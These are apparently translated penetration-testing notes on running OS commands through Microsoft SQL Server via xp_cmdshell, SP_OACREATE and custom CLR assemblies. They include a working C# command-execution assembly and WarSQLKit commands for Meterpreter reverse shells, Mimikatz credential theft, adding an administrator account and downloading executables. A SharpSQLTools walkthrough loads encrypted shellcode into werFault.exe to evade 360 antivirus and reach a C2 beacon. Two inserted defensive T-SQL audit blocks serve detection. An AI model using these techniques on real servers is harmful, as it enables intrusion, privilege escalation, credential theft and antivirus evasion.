MSSQL notes
MSSQL Fileless Rootkit – MSSQL Attack Tool – WarSQLKit Eyüp Çelik // Sr. Cyber Security Expert (eyupcelik.com.tr)
MSSQL database command execution summary - Xianzhi community (aliyun.com)
Post-penetration-test information gathering summary | post-exploitation information gathering tips - 🔰雨苁ℒ🔰 (ddosi.org)
MSSQL: executing commands with CLR assemblies - Y4er's blog
Pentest_Note/wiki/权限提升/Windows提权/MSSQL.md
[Translation] Attacking SQL Server CLR assemblies - Xianzhi community (aliyun.com)
Attacking SQL Server CLR Assemblies (netspi.com)
[Tech share] Attacking SQL Server CLR assemblies - Anquanke security news platform (anquanke.com)
Notes on an MSSQL injection
For the notes, refer to "MSSQL database command execution summary"
• xp_cmdshell usage
• COM component usage
• CLR usage
• CLR bypass 360
xp_cmdshell usage
Checking the xp_cmdshell status
Look up xp_cmdshell in master.dbo.sysobjects. xtype is the object type; xtype='X' here means the object type of xp_cmdshell is an extended stored procedure.
select * from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
# returns 1 if it exists
Enabling xp_cmdshell
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
Disabling
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
Executing commands
exec master..xp_cmdshell 'whoami'
exec master..xp_cmdshell 'ipconfig'
Using xplog70.dll to restore a deleted xp_cmdshell
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\xplog70.dll'
COM component usage
Use the SQL Server COM component SP_OACREATE to execute system commands.
Checking the SP_OACREATE status
select * from master.dbo.sysobjects where xtype='X' and name='SP_OACREATE'
or
select count(*) from master.dbo.sysobjects where xtype='X' and name='SP_OACREATE'
# returns 1 if it exists
Enabling SP_OACREATE
EXEC sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures',1;
RECONFIGURE WITH OVERRIDE;
Executing a system command through SP_OACREATE
declare @shell int
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c whoami > D:\Temp1.txt'
If permissions are insufficient, write to another location, for example under another drive letter. This method returns no output, so the result has to be read back some other way.
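Added defensive check, not from the original post or from any of the tools it references: a T-SQL audit that shows whether the options the xp_cmdshell and SP_OACREATE steps above turn on are currently in effect, which extended stored procedures are bound to a DLL given as an explicit path (what sp_addextendedproc with 'D:\xplog70.dll' produces), and which principals hold explicit grants on xp_cmdshell. It uses only the documented catalog views sys.configurations, sys.extended_procedures, sys.objects, sys.database_permissions and sys.database_principals; the expectation that xp_cmdshell resolves to xpstar.dll is the stock binding on SQL Server 2005 and later.

```sql
USE master;
GO

-- 1. Server options controlled by sp_configure that the notes above enable.
--    config_value is the stored setting, value_in_use the running one (they differ until RECONFIGURE).
SELECT c.name,
       CAST(c.value AS int)        AS config_value,
       CAST(c.value_in_use AS int) AS value_in_use,
       CASE WHEN CAST(c.value_in_use AS int) = 1 THEN 'ENABLED - review' ELSE 'disabled' END AS state
FROM sys.configurations AS c
WHERE c.name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled', 'clr strict security')
ORDER BY c.name;

-- 2. Extended stored procedures and the DLL each one is registered from.
--    Stock entries carry a bare file name; one registered with sp_addextendedproc from an explicit
--    path (the xplog70.dll "restore" step above) shows the full path, and xp_cmdshell normally
--    maps to xpstar.dll.
SELECT xp.name,
       xp.dll_name,
       CASE
           WHEN xp.dll_name LIKE '%\%' OR xp.dll_name LIKE '%/%'
               THEN 'registered from explicit path - investigate'
           WHEN xp.name = 'xp_cmdshell' AND xp.dll_name <> 'xpstar.dll'
               THEN 'xp_cmdshell bound to non-standard DLL - investigate'
           ELSE ''
       END AS note
FROM sys.extended_procedures AS xp
ORDER BY xp.name;

-- 3. Explicit permission grants on xp_cmdshell. Members of sysadmin need no grant, so also
--    review the output of: EXEC sp_helpsrvrolemember 'sysadmin';
SELECT dp.state_desc,
       dp.permission_name,
       pr.name      AS grantee,
       pr.type_desc AS grantee_type
FROM sys.database_permissions AS dp
JOIN sys.objects             AS o  ON o.object_id = dp.major_id
JOIN sys.database_principals AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE dp.class = 1            -- object-level permission
  AND o.name = 'xp_cmdshell';
```

Run it as a login with VIEW SERVER STATE and access to master. Any row in query 1 showing value_in_use = 1 that your change records do not explain, any path-qualified dll_name in query 2, or a grantee in query 3 that is not an expected proxy account is worth a ticket; the 'disable' lines earlier in these notes are the statements that turn the options back off.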
CLR usage
Common Language Runtime (CLR) overview - SQL Server | Microsoft Learn
Beginning with SQL Server 2005 (9.x), SQL Server integrates the common language runtime (CLR) component of the .NET Framework for Microsoft Windows. This means that stored procedures, triggers, user-defined types, user-defined functions, user-defined aggregates and streaming table-valued functions can now be written in any .NET Framework language, including Microsoft Visual Basic .NET and Microsoft Visual C#.
Writing the CLR assembly
Create a SQL Server database project in VS; remember to change the class name and namespace.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void ExecCommand(string cmd)
    {
        // Put your code here
        SqlContext.Pipe.Send("Command is running, please wait.");
        SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
    }

    // Starts filename with the given arguments, sends stdout back through the SQL pipe and returns it.
    public static string RunCommand(string filename, string arguments)
    {
        var process = new Process();
        process.StartInfo.FileName = filename;
        if (!string.IsNullOrEmpty(arguments))
        {
            process.StartInfo.Arguments = arguments;
        }
        process.StartInfo.CreateNoWindow = true;
        process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        process.StartInfo.UseShellExecute = false;
        process.StartInfo.RedirectStandardError = true;
        process.StartInfo.RedirectStandardOutput = true;
        var stdOutput = new StringBuilder();
        process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
        string stdError = null;
        try
        {
            process.Start();
            process.BeginOutputReadLine();
            stdError = process.StandardError.ReadToEnd();
            process.WaitForExit();
        }
        catch (Exception e)
        {
            // If Start() failed there is no ExitCode to read, so report the error and return what we have.
            SqlContext.Pipe.Send(e.Message);
            return stdOutput.ToString();
        }
        if (process.ExitCode == 0)
        {
            SqlContext.Pipe.Send(stdOutput.ToString());
        }
        else
        {
            var message = new StringBuilder();
            if (!string.IsNullOrEmpty(stdError))
            {
                message.AppendLine(stdError);
            }
            if (stdOutput.Length != 0)
            {
                message.AppendLine("Std output:");
                message.AppendLine(stdOutput.ToString());
            }
            SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
        }
        return stdOutput.ToString();
    }
}
Importing the assembly
CLR is not enabled by default in MSSQL, so it has to be enabled manually
sp_configure 'clr enabled',1
GO
RECONFIGURE
GO
ALTER DATABASE master SET TRUSTWORTHY ON;
Once this has run, the assembly is imported into MSSQL. Here it is loaded as a byte stream; you can also import the DLL file directly. For importing a DLL, see "MSSQL: executing commands with CLR assemblies - Y4er's blog".
Then just execute it.
Create the stored procedure --- remember to change the name here; mine is Database1
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]
go
exec dbo.execcommand 'whoami'
Done. Huorong alerted the whole way through, exciting stuff. Let's look back at the CLR bypass.
WarSQLKit
GitHub - mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit
Download it, open it; it's a seven-year-old antique.
Nice Huorong, nice block.
Ugh, let's add a whitelist entry.
Just open the sln, build, done.
Then follow the steps from the "Importing the assembly" section.
Import the assembly
CREATE ASSEMBLY [WarSQLKit]
AUTHORIZATION [dbo]
FROM 0x4D-your-code-00;
GO
Create the stored procedure
CREATE PROCEDURE [dbo].[CmdExec]
@cmd NVARCHAR (MAX) NULL
AS EXTERNAL NAME [WarSQLKit].[StoredProcedures].[CmdExec]
GO
Importing the DLL directly
Then create the stored procedure
CREATE PROCEDURE sp_cmdExec
@Command [nvarchar](4000)
WITH EXECUTE AS CALLER
AS
EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec
GO
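Added defensive inventory, not from the original post nor from WarSQLKit or Y4er's code: T-SQL that enumerates what the two import procedures above (the byte-stream CREATE ASSEMBLY and the direct DLL import) leave behind in a database: TRUSTWORTHY databases, user-defined assemblies with their permission set and a hash of the stored bytes, the procedures bound to them through EXTERNAL NAME, and whether the runtime currently has each assembly loaded. It uses only documented catalog views and DMVs (sys.databases, sys.assemblies, sys.assembly_files, sys.assembly_modules, sys.dm_clr_loaded_assemblies, sys.dm_clr_appdomains); HASHBYTES over inputs longer than 8000 bytes needs SQL Server 2016 or later, and the removal statements at the end use bracketed placeholders rather than real object names.

```sql
-- Run in master (the import steps above use it) and in every user database you care about.

-- 1. Databases with TRUSTWORTHY on: needed for an unsigned UNSAFE/EXTERNAL_ACCESS assembly to load.
--    A TRUSTWORTHY database owned by a sysadmin login is the combination to flag first.
SELECT d.name,
       d.is_trustworthy_on,
       SUSER_SNAME(d.owner_sid) AS owner_login
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1;

-- 2. User-defined assemblies in the current database.
--    EXTERNAL_ACCESS and UNSAFE are the permission sets that allow Process.Start; the SHA-256 of the
--    stored bytes can be compared with the build you expect to be deployed or with a known-bad list.
SELECT a.name,
       a.permission_set_desc,
       a.create_date,
       af.name                                                    AS file_name,
       DATALENGTH(af.content)                                     AS byte_length,
       CONVERT(varchar(64), HASHBYTES('SHA2_256', af.content), 2) AS sha256,
       CASE WHEN EXISTS (SELECT 1
                         FROM sys.dm_clr_loaded_assemblies AS la
                         JOIN sys.dm_clr_appdomains        AS ad ON ad.appdomain_address = la.appdomain_address
                         WHERE la.assembly_id = a.assembly_id
                           AND ad.db_id = DB_ID())
            THEN 'loaded in CLR' ELSE 'not loaded' END            AS runtime_state
FROM sys.assemblies AS a
JOIN sys.assembly_files AS af ON af.assembly_id = a.assembly_id
WHERE a.is_user_defined = 1
ORDER BY a.create_date DESC;

-- 3. Procedures and functions bound to those assemblies via EXTERNAL NAME
--    (this is where a wrapper such as sp_cmdExec or dbo.ExecCommand shows up).
SELECT OBJECT_SCHEMA_NAME(am.object_id) AS schema_name,
       OBJECT_NAME(am.object_id)        AS object_name,
       a.name                           AS assembly_name,
       a.permission_set_desc,
       am.assembly_class,
       am.assembly_method
FROM sys.assembly_modules AS am
JOIN sys.assemblies       AS a ON a.assembly_id = am.assembly_id
WHERE a.is_user_defined = 1
ORDER BY schema_name, object_name;

-- 4. Removal, for an entry the queries above cannot account for: drop the wrapper first, then the
--    assembly, then turn TRUSTWORTHY back off. Names in angle brackets are placeholders.
-- DROP PROCEDURE [dbo].[<object_name from query 3>];
-- DROP ASSEMBLY [<assembly_name from query 2>];
-- ALTER DATABASE [<database>] SET TRUSTWORTHY OFF;
```

Keep the sha256 column from a clean baseline and diff against it on a schedule; an assembly that appears with permission_set_desc = UNSAFE in a database that had none is the signal both import procedures above produce. On SQL Server 2017 and later the 'clr strict security' option treats every assembly as UNSAFE, so an unsigned assembly then also needs an entry in sys.trusted_assemblies, which is worth listing alongside query 2.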
Usage
Execute a command
EXEC sp_cmdExec 'whoami';
Execute a Windows command as NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'whoami /RunSystemPriv';
Run a PowerShell command as NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS';
Spawn an x86 Meterpreter reverse shell running as NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem';
Spawn an x64 Meterpreter reverse shell running as NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem';
Spawn an x64 Meterpreter RC4 reverse shell running as NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'
RC4PASSWORD=warsql
Spawn an x86 meterpreter_bind_tcp shell running as NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem';
Run the Mimikatz function to grab passwords
EXEC sp_cmdExec 'sp_Mimikatz';
Get the Mimikatz log
select * from WarSQLKitTemp
File download
EXEC sp_cmdExec 'sp_downloadFile http://test.com/file.exe C:\ProgramData\file.exe 300';
Get MSSQL hashes
EXEC sp_cmdExec 'sp_getSqlHash';
Get the Windows version
EXEC sp_cmdExec 'sp_getProduct';
Get the available databases
EXEC sp_cmdExec 'sp_getDatabases';
https://github.com/evi1ox/MSSQL_BackDoor/tree/master/MSSQL-Fileless-Rootkit-WarSQLKit
EXEC sp_cmdExec 'whoami'; => Any Windows command
EXEC sp_cmdExec 'whoami /RunSystemPriv'; => Any Windows command with NT AUTHORITY\SYSTEM rights
EXEC sp_cmdExec '"net user eyup P@ssw0rd1 /add" /RunSystemPriv'; => Adding users with RottenPotato (Kumpir)
EXEC sp_cmdExec '"net localgroup administrators eyup /add" /RunSystemPriv'; => Adding user to local group with RottenPotato (Kumpir)
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS'; => (Powershell) with RottenPotato (Kumpir)
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection with NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x64 Meterpreter Reverse Connection with NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection RC4 with NT AUTHORITY\SYSTEM, RC4PASSWORD=warsql
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem'; => x86 Meterpreter Bind Connection with NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_Mimikatz';
select * from WarSQLKitTemp => Get Mimikatz Log. Thnks Benjamin Delpy :)
EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:\ProgramData\file.exe 300'; => Download File
EXEC sp_cmdExec 'sp_getSqlHash'; => Get MSSQL Hash
EXEC sp_cmdExec 'sp_getProduct'; => Get Windows Product
EXEC sp_cmdExec 'sp_getDatabases'; => Get Available Database
Some other operations, which lead on to the tool usage.
Tools
mssql privilege escalation: using CLR to bypass 360 - AD钙奶's blog (ad-calcium.github.io)
MSSQL fileless rootkit WarSQLKit - Penetration Testing Center - cnblogs (cnblogs.com)
GitHub - uknowsec/SharpSQLTools: SharpSQLTools, a small tool written together with @Rcoil; it can upload and download files, execute commands with output through xp_cmdshell and sp_oacreate, and load CLR assemblies to perform the corresponding operations.
GitHub - evi1ox/MSSQL_BackDoor
QiAnXin attack & defense community - exploring MSSQL attack and defense (butian.net)
Found a reference article and noted it down: "mssql privilege escalation: using CLR to bypass 360 - AD钙奶's blog (ad-calcium.github.io)"; it is also backed up in the same directory. For the underlying attack principles, see the articles at Ana Sayfa - Eyüp Çelik // Sr. Cyber Security Expert (eyupcelik.com.tr).
SharpSQLTools
Download the compiled build and run it directly from PowerShell
~\Desktop\SharpSQLTools
❯ .\SharpSQLTools.exe -h
by Rcoil & Uknow
Usage:
SharpSQLTools target:port username password database - interactive console
SharpSQLTools target:port username password database module command - non-interactive console
Module:
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_oacreate {cmd} - executes cmd using sp_oacreate
enable_ole - you know what it means
disable_ole - you know what it means
upload {local} {remote} - upload a local file to a remote path (OLE required)
download {remote} {local} - download a remote file to a local path
enable_clr - you know what it means
disable_clr - you know what it means
install_clr - create assembly and procedure
uninstall_clr - drop clr
clr_pwd - print current directory by clr
clr_ls {directory} - list files by clr
clr_cd {directory} - change directory by clr
clr_ps - list process by clr
clr_netstat - netstat by clr
clr_ping {host} - ping by clr
clr_cat {file} - view file contents by clr
clr_rm {file} - delete file by clr
clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
clr_efspotato {cmd} - exec by EfsPotato like clr_exec
clr_badpotato {cmd} - exec by BadPotato like clr_exec
clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
clr_dumplsass {path} - dumplsass by clr
clr_rdp - check RDP port and Enable RDP
clr_getav - get anti-virus software on this machin by clr
clr_adduser {user} {pass} - add user by clr
clr_download {url} {path} - download file from url by clr
clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin)
clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt
clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader
exit
Enabling the CLR feature
Creating the CLR assembly from the file's hex stream
Using CLR to bypass 360
192.168.10.105 C2 client
192.168.10.106 C2 server
192.168.10.1xx target
payload
SharpSQLTools
1 - Enable the MSSQL CLR feature
SharpSQLTools.exe 192.168.10.107 sa 123456 master enable_clr
2 - Create the CLR assembly from the file's hex stream
SharpSQLTools.exe 192.168.10.107 sa 123456 master install_clr
3 - Upload payload.txt to a writable directory
The copy command used to merge the files gets blocked by 360, but by then the file has already been uploaded in pieces.
SharpSQLTools.exe 192.168.10.107 sa 123456 master upload payload.txt C:\Users\Public\payload.txt
4 - Use clr_combine to merge the file
SharpSQLTools.exe 192.168.10.107 sa 123456 master clr_combine C:\Users\Public\payload.txt
5 - Use clr_scloader1 to load it into memory
The clr_shellcode_loader implemented in SharpSQLTools uses APC injection: it decrypts the shellcode and injects it into a newly started werFault.exe process.
loader is the decryption key
SharpSQLTools.exe 192.168.10.107 sa 123456 master clr_scloader1 C:\Users\Public\payload.txt loader
Results:
Merging the file
After merging, the file is complete
Loading into memory with clr_scloader1
SharpSQLTools.exe 192.168.10.107 sa 123456 master clr_scloader1 C:\Users\Public\payload.txt loader
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[-] could not spawn C:\Windows\system32\cmd.exe /C whoami: 5
Execution blocked.
Process chain bypass
Inject into another process to get around the process-chain protection on sqlservr.exe.
That's it.
Target environment
Originally published on the WeChat public account (wulala520): MSSQL notes - CLR + bypass